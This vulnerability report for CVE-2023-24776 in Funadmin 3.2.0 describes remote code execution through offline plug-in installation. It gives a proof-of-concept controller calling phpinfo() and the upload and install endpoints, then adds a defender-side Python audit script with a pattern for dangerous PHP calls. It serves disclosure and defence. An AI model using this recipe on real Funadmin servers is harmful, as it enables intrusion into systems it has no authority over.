CVE-2023-24776: Background offline installation plug-in rce · Issue #7 · funadmin/funadmin
Funadmin v3.2.0 was discovered to contain a remote code execution (RCE) vulnerability via the component \controller\Addon.php.
Vulnerability product: funadmin
Vulnerability version: 3.2.0
Vulnerability type: remote code execution
Vulnerability Details:
Background offline installation plug-in rce
The vulnerability is located in app\backend\controller\Addon.php: the plug-in installation routine does not filter malicious code in the uploaded package.
Therefore, we can construct a malicious plug-in controller to cause remote code execution.
Construct the tarball
snowflake\controller\Index.php executes the malicious code; here I call phpinfo();

```php
<?php
namespace addons\snowflake\controller;
use fun\addons\Controller;
use think\App;
class Index extends Controller
{
    // home page
    public function index()
    {
        phpinfo();
        echo hook_one('snowflake');
    }
}
```
Once the compressed package is built, upload the malicious package through Background > Plug-in > Plug-in management > Offline installation:
http://192.168.3.129:8092/backend/ajax/uploads?save=1&path=addon
http://192.168.3.129:8092/backend/addon/localinstall
After a successful installation, visit
http://192.168.3.129:8092/addons/snowflake
Our malicious code is triggered successfully.
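A defender-side check, added here as an example and not part of the original report or of funadmin: a heuristic audit of a plug-in tarball before offline installation that flags PHP files calling functions a plug-in controller has no ordinary reason to use (phpinfo, eval, system and similar) and rejects members with absolute, traversing or link paths. The sample archive is constructed in memory to mirror the layout in the report (snowflake/controller/Index.php calling phpinfo()); the gzip-compressed tar format and the `info.ini` file are assumptions.

```python
import io
import re
import tarfile

# Constructed sample controller mirroring the report's layout
# (snowflake/controller/Index.php calling phpinfo()).
SAMPLE_CONTROLLER = b"""<?php
namespace addons\\snowflake\\controller;
class Index { public function index() { phpinfo(); } }
"""

# Calls a plug-in controller has no ordinary reason to make.
DANGEROUS_CALLS = re.compile(
    rb"\b(phpinfo|eval|system|exec|shell_exec|passthru|popen|proc_open|assert)\s*\(",
    re.IGNORECASE,
)


def build_sample_tarball() -> bytes:
    """Build the constructed plug-in tarball in memory (assumed .tar.gz layout)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        for path, data in (
            ("snowflake/controller/Index.php", SAMPLE_CONTROLLER),
            ("snowflake/info.ini", b"name = snowflake\n"),
        ):
            info = tarfile.TarInfo(path)
            info.size = len(data)
            tf.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def audit_plugin_tarball(data: bytes) -> list:
    """Return (member, reason) findings; an empty list means nothing was flagged."""
    findings = []
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:gz") as tf:
        for member in tf.getmembers():
            name = member.name
            # Reject absolute paths, traversal and links before anything is extracted.
            if name.startswith("/") or ".." in name.split("/") or member.issym() or member.islnk():
                findings.append((name, "unsafe path or link"))
                continue
            if not member.isfile() or not name.lower().endswith((".php", ".phtml", ".inc")):
                continue
            content = tf.extractfile(member).read()
            for m in DANGEROUS_CALLS.finditer(content):
                line = content.count(b"\n", 0, m.start()) + 1
                findings.append((name, f"line {line}: {m.group(1).decode()}()"))
    return findings
```

This is a heuristic only: a plug-in installed offline runs as the application by design, so the real control is restricting who may reach the upload and localinstall endpoints and accepting only packages from a trusted, signed source.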